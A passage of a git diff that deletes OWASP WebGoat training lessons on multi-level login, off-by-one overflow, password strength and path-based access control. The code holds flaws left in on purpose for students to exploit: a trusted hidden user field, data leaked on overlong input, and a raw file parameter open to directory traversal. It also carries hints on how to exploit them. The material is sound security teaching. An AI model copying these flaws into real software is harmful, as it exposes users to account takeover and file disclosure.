= ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) - { - - tanNr = results.getInt(results.getRow()); - tanNr = tanNr + 1; - if (tanNr > 5) - { - tanNr = 0; - } - } - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - 
connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - return tanNr; - } - - /** - * Get the tan for a user with specific position - * - * @param user - * @param tanPosition - * @param s - * @return tan - */ - private String getTan(String user, int tanPosition, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT tan.tanValue FROM user_data_tan, tan WHERE user_data_tan.first_name = ? " - + "AND user_data_tan.userid = tan.userid AND tan.tanNr = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - prepStatement.setInt(2, tanPosition); - - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) - { - // System.out.println(results.getString("tanValue")); - return results.getString("tanValue"); - - } - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - return ""; - - } - - /** - * See if the tan is correct - * - * @param tan - * @return true if the tan is correct - */ - private boolean correctTan(String tan, WebSession s) - { - // if (!getCurrentTan(s).equals("")) { return tan.equals(String.valueOf(currentTan)); } - if (!getCurrentTan(s).equals("")) { return tan.equals(getCurrentTan(s)); } - return false; - } - - /** - * See if the password and corresponding user is valid - * - * @param userName - * @param password - * @param s - * @return true if the password was correct - */ - private boolean correctLogin(String userName, String password, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? 
AND password = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, userName); - prepStatement.setString(2, password); - - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) { - - return true; - - } - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - return false; - - } - - protected Category getDefaultCategory() - { - return Category.AUTHENTICATION; - } - - /** - * Gets the hints attribute of the RoleBasedAccessControl object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add("How does the server know which User has to be logged in"); - hints.add("Maybe taking a look at the source code helps"); - hints.add("Watch out for hidden fields"); - hints.add("Manipulate the hidden field 'hidden_user'"); - - return hints; - - } - - public String getInstructions(WebSession s) - { - String instructions = ""; - - instructions = "You are an attacker called Joe. You have a valid account by webgoat financial. Your goal is to log in as " - + "Jane. Your username is Joe and your password is banana. This are your TANS:
" - + "Tan #1 = 15161
" - + "Tan #2 = 4894
" - + "Tan #3 = 18794
" - + "Tan #4 = 1564
" - + "Tan #5 = 45751
"; - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(110); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - public String getTitle() - { - return ("Multi Level Login 2"); - } - - public Element getCredits() - { - return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement("")); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/NewLesson.java b/src/main/java/org/owasp/webgoat/lessons/NewLesson.java deleted file mode 100644 index 90b22af3d..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/NewLesson.java +++ /dev/null 
@@ -1,88 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.StringElement;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects. 
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created October 28, 2003
- */
-public class NewLesson extends LessonAdapter
-{
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- return super.createContent(s);
- // makeSuccess(s);
- // ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!"));
- // return (ec);
- }
-
- /**
- * Gets the category attribute of the NEW_LESSON object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.INTRODUCTION;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(85);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the DirectoryScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("How to create a Lesson");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Your name goes here!", new StringElement(""));
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/OffByOne.java b/src/main/java/org/owasp/webgoat/lessons/OffByOne.java
deleted file mode 100644
index 2c63686bf..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/OffByOne.java
+++ /dev/null
@@ -1,530 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.br;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Yiannis Pavlosoglou WebGoat - * @created December 05, 2009 - */ -public class OffByOne extends LessonAdapter -{ - private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"}; - - private final static String ROOM_NUMBER = "room_no"; - - private final static String FIRST_NAME = "first_name"; - - private final static String LAST_NAME = "last_name"; - - private final static String PRICE_PLAN = "price_plan"; - - private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd") - .setBorder(0).setHspace(0).setVspace(0); - - /** - *

The main method for creating content, implemented - * from the the LessonAdapter class.

- * - *

This particular "Off-by-One" lesson belonging in - * the category of "Buffer Overflows" carries three - * steps.

- * - * @param s - * WebSession - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - if(isFirstStep(s)) - { - ec.addElement(makeFirstStep(s)); - } - else - { - if (isSecondStep(s)) - { - ec.addElement(makeSecondStep(s)); - } - else - { - ec.addElement(makeThirdStep(s)); - } - } - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - *

Returns the Buffer Overflow category for this - * lesson.

- * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.BUFFER_OVERFLOW; - } - - /** - *

Returns the hints as a List of Strings - * for this lesson.

- * - * @return The hints values - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("While registering for Internet usage, see where else your details are used during the registration process."); - hints.add("See which fields during the registration process, allow for really long input to be submitted."); - hints.add("Check for hidden form fields during registration"); - hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1"); - hints.add("Overflow the room number field with 4096+1 characters and look for hidden fields"); - hints.add("Enter the VIP name in the first and last name fields"); - return hints; - } - - /** - *

Get the default ranking within the "Buffer - * Overflow" category.

- * - *

Currently ranked to be the first lesson in - * this category.

- * - * @return The value of 5 as an Integer Object - */ - protected Integer getDefaultRanking() - { - return new Integer(5); - } - - /** - *

Gets the title attribute for this lesson.

- * - * @return "Off-by-One Overflows" - */ - public String getTitle() - { - return ("Off-by-One Overflows"); - } - - /** - * yada, yada... - */ - public Element getCredits() - { - return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO); - } - - /** - *

Based on the parameters currently with values, this method - * returns true if we are in the first step of this lesson.

- * - * @param s - * @return true if we are in the first step of the lesson. - */ - protected boolean isFirstStep(WebSession s) - { - String room = s.getParser().getRawParameter(ROOM_NUMBER, ""); - String name = s.getParser().getRawParameter(FIRST_NAME, ""); - String last = s.getParser().getRawParameter(LAST_NAME, ""); - - return (room.isEmpty() && name.isEmpty() && last.isEmpty() ); - } - - /** - *

Based on the parameters currently with values, this method - * returns true if we are in the second step of this lesson.

- * - * @param s - * @return true if we are in the second step of the lesson - */ - protected boolean isSecondStep(WebSession s) - { - String price = s.getParser().getRawParameter(PRICE_PLAN, ""); - - return price.isEmpty(); - } - - /** - *

Method for constructing the first step and returning it as - * an Element.

- * - * @param s - * @return The Element that is the first step. - */ - private Element makeFirstStep(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String param = ""; - - // Header - ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:")); - ec.addElement(new br()); - ec.addElement(new br()); - ec.addElement(new StringElement("Step 1/2")); - ec.addElement(new br()); - ec.addElement(new br()); - - ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system.")); - ec.addElement(new br()); - ec.addElement(new br()); - - // Table - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - // First Name - try { - param = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25); - } catch (ParameterNotFoundException e) { - param = ""; - } catch (ValidationException e) { - param = ""; - } - Input input = new Input(Input.TEXT, FIRST_NAME, param); - - TR tr = new TR(); - tr.addElement(new TD().addElement("First Name: ")); - tr.addElement(new TD().addElement(input)); - tr.addElement(new TD().addElement("*")); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(" ")); - t.addElement(tr); - - // Last Name - try { - param = s.getParser().getStrictAlphaParameter(LAST_NAME, 25); - } catch (ParameterNotFoundException e) { - param = ""; - } catch (ValidationException e) { - param = ""; - } - input = new Input(Input.TEXT, LAST_NAME, param); - - tr = new TR(); - tr.addElement(new TD().addElement("Last Name: ")); - tr.addElement(new TD().addElement(input)); - tr.addElement(new TD().addElement("*")); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(" ")); - 
tr.addElement(new TD().addElement(" ")); - t.addElement(tr); - - // Room Number - try { - param = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25); - } catch (ParameterNotFoundException e) { - param = ""; - } catch (ValidationException e) { - param = ""; - } - input = new Input(Input.TEXT, ROOM_NUMBER, param); - - tr = new TR(); - tr.addElement(new TD().addElement("Room Number: ")); - tr.addElement(new TD().addElement(input)); - tr.addElement(new TD().addElement("*")); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(" ")); - t.addElement(tr); - - // Submit - tr = new TR(); - tr.addElement(new TD().addElement(" ")); - tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit"))); - tr.addElement(new TD().addElement(" ")); - t.addElement(tr); - - ec.addElement(t); - - // Footer - ec.addElement(new br()); - ec.addElement(new br()); - ec.addElement(new StringElement("* The above fields are required for login.")); - ec.addElement(new br()); - ec.addElement(new br()); - - - return ec; - } - - /** - *

Method for constructing the second step and returning it as - * an Element.

- *
- * @param s
- * @return The Element that is the second step.
- */
- private Element makeSecondStep(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String param = "";
-
- // Header
- ec.addElement(new StringElement("Please select from the following available price plans:"));
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("Step 2/2"));
- ec.addElement(new br());
- ec.addElement(new br());
-
- ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- // Table
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
-
- // First Empty Row
- TR tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Price Plans
- tr = new TR();
- tr.addElement(new TD().addElement("Available Price Plans:"));
- tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Submit
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- ec.addElement(t);
- ec.addElement("\r\n");
-
- // Hidden Form Fields
- param = s.getParser().getStringParameter(LAST_NAME, "");
- Input input = new Input(Input.HIDDEN, LAST_NAME, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param = s.getParser().getStringParameter(FIRST_NAME, "");
- input = new Input(Input.HIDDEN, FIRST_NAME, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param = s.getParser().getStringParameter(ROOM_NUMBER, "");
- input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
-
- // Footer
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
- ec.addElement(new br());
- ec.addElement(new br());
-
-
- return ec;
- }
-
- /**
- *

Method for constructing the third step and returning it as - * an Element.

- *
- * @param s
- * @return The Element that is the third step.
- */
- private Element makeThirdStep(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String param1 = "";
- String param2 = "";
- String param3 = "";
-
- // Header
- ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("Process complete"));
- ec.addElement(new br());
- ec.addElement(new br());
-
- ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- // Table
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
-
- // First Empty Row
- TR tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Price Plans
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Submit
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- ec.addElement(t);
- ec.addElement("\r\n");
-
- // Hidden Form Fields
- param1 = s.getParser().getStringParameter(LAST_NAME, "");
- Input input = new Input(Input.HIDDEN, "a", param1);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param2 = s.getParser().getStringParameter(FIRST_NAME, "");
- input = new Input(Input.HIDDEN, "b", param2);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param3 = s.getParser().getStringParameter(ROOM_NUMBER, "");
- input = new Input(Input.HIDDEN, "c", param3);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- // And finally the check...
- if(param3.length() > 4096)
- {
- ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "e", "Ravern"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "f", "4321"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "g", "John"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "h", "Smith"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "i", "56"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "j", "Ana"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "k", "Arneta"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "l", "78"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "m", "Lewis"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "o", "9901"));
- ec.addElement("\r\n");
-
- s.setMessage("To complete the lesson, restart lesson and enter VIP first/last name");
-
- }
- if (("Johnathan".equalsIgnoreCase(param2) || "John".equalsIgnoreCase(param2)
- || "Ana".equalsIgnoreCase(param2) ||"Lewis".equalsIgnoreCase(param2))
- && ("Ravern".equalsIgnoreCase(param1) || "Smith".equalsIgnoreCase(param1)
- || "Arneta".equalsIgnoreCase(param1) ||"Hamilton".equalsIgnoreCase(param1)))
- {
- // :)
- // Allows for mixed VIP names, but that's not really the point
- makeSuccess(s);
- }
-
- // Footer
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("We would like to thank you for your payment."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- return ec;
- }
-
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java b/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java
deleted file mode 100644
index 8c440261c..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java
+++ /dev/null
@@ -1,212 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-import java.util.TreeMap;
-import java.util.Map.Entry;
-
-import org.apache.commons.collections.CollectionUtils;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.LI;
-import org.apache.ecs.html.OL;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Reto Lippuner, Marcel Wirth
- * @created April 7, 2008
- */
-
-public class PasswordStrength extends LessonAdapter
-{
- private Map passwords = new TreeMap() {{
- put("pass1", new Password("123456", "seconds", "0", "dictionary based, in top 10 most used passwords"));
- put("pass2", new Password("abzfezd", "seconds", "2", "26 chars on 7 positions, 8 billion possible combinations"));
- put("pass3", new Password("a9z1ezd", "seconds", "19", "26 + 10 chars on 7 positions = 78 billion possible combinations"));
- put("pass4", new Password("aB8fEzDq", "hours", "15", "26 + 26 + 10 chars on 8 positions = 218 trillion possible combinations"));
- put("pass5", new Password("z8!E?7D$", "days", "20", "96 chars on 8 positions = 66 quintillion possible combinations"));
- put("pass6", new Password("My1stPassword!:Redd", "quintillion years", "364", "96 chars on 19 positions = 46 undecillion possible combinations"));
- }};
-
- private class Password {
-
- String password;
- String timeUnit;
- String answer;
- private String explanation;
-
- public Password(String password, String timeUnit, String answer, String explanation) {
- this.password = password;
- this.timeUnit = timeUnit;
- this.answer = answer;
- this.explanation = explanation;
- }
- }
-
- private boolean checkSolution(WebSession s) throws ParameterNotFoundException {
- boolean allCorrect = true;
- for ( int i = 1; i <= passwords.size(); i++ ) {
- String key = "pass" + i;
- allCorrect = allCorrect && s.getParser().getStringParameter(key, "").equals(passwords.get(key).answer);
- }
- return allCorrect;
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- if (checkSolution(s))
- {
- makeSuccess(s);
- ec.addElement(new BR());
- ec.addElement(new StringElement("As a guideline not bound to a single solution."));
- ec.addElement(new BR());
- ec.addElement(new StringElement("Assuming the calculations per second 4 billion: "));
- ec.addElement(new BR());
- OL ol = new OL();
- for ( Password password : passwords.values()) {
- ol.addElement(new LI(String.format("%s - %s %s (%s)", password.password, password.answer, password.timeUnit, password.explanation)));
- }
- ec.addElement(ol);
- } else
- {
- ec.addElement(new BR());
- ec.addElement(new StringElement("How much time would a desktop PC take to crack these passwords?"));
- ec.addElement(new BR());
- ec.addElement(new BR());
- Table table = new Table();
- for ( Entry entry : passwords.entrySet()) {
- TR tr = new TR();
- TD td1 = new TD();
- TD td2 = new TD();
- Input input1 = new Input(Input.TEXT, entry.getKey(), "");
- td1.addElement(new StringElement("Password = " + entry.getValue().password));
- td1.setWidth("50%");
- td2.addElement(input1);
- td2.addElement(new StringElement(" " + entry.getValue().timeUnit));
- tr.addElement(td1);
- tr.addElement(td2);
- table.addElement(tr);
- }
- ec.addElement(table);
- ec.addElement(new BR());
- ec.addElement(new BR());
- Div div = new Div();
- div.addAttribute("align", "center");
- Element b = ECSFactory.makeButton("Go!");
- div.addElement(b);
- ec.addElement(div);
- }
- } catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
-
- return (ec);
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Copy the passwords into the code checker.");
- return hints;
- }
-
- /**
- * Gets the ranking attribute of the HelloScreen object
- *
- * @return The ranking value
- */
- private final static Integer DEFAULT_RANKING = new Integer(6);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- protected Category getDefaultCategory()
- {
- return Category.AUTHENTICATION;
- }
-
- public String getInstructions(WebSession s)
- {
- String instructions = "The accounts of your web application are only as save as the passwords. "
- + "For this exercise, your job is to test several passwords on https://howsecureismypassword.net. "
- + " You must test all 6 passwords at the same time..."
- + " On your applications you should set good password requirements! ";
- return (instructions);
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Password Strength");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java b/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java
deleted file mode 100644
index 93fbe421a..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/PathBasedAccessControl.java
+++ /dev/null
@@ -1,268 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.FileReader;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
- */
-public class PathBasedAccessControl extends LessonAdapter
-{
-
- private final static String FILE = "File";
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- try
- {
- String dir = s.getContext().getRealPath("/lesson_plans/en");
- File d = new File(dir);
-
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- String[] list = d.list();
- String listing = "

"+getLabelManager().get("CurrentDirectory")+" " + Encoding.urlDecode(dir) - + "

"+getLabelManager().get("ChooseFileToView")+"

"; - - TR tr = new TR(); - tr.addElement(new TD().setColSpan(2).addElement(new StringElement(listing))); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(FILE, list, "", 15))); - tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("ViewFile")))); - t.addElement(tr); - - ec.addElement(t); - - // FIXME: would be cool to allow encodings here -- hex, percent, - // url, etc... - String file = s.getParser().getRawParameter(FILE, ""); - - // defuse file searching - boolean illegalCommand = getWebgoatContext().isDefuseOSCommands(); - if (getWebgoatContext().isDefuseOSCommands()) - { - // allow them to look at any file in the webgoat hierachy. Don't - // allow them - // to look about the webgoat root, except to see the LICENSE - // file - if (upDirCount(file) == 3 && !file.endsWith("LICENSE")) - { - s.setMessage(getLabelManager().get("AccessDenied")); - s.setMessage(getLabelManager().get("ItAppears1")); - } - else if (upDirCount(file) > 3) - { - s.setMessage(getLabelManager().get("AccessDenied")); - s.setMessage(getLabelManager().get("ItAppears2")); - } - else - { - illegalCommand = false; - } - } - - // Using the URI supports encoding of the data. - // We could force the user to use encoded '/'s == %2f to make the lesson more difficult. - // We url Encode our dir name to avoid problems with special characters in our own path. 
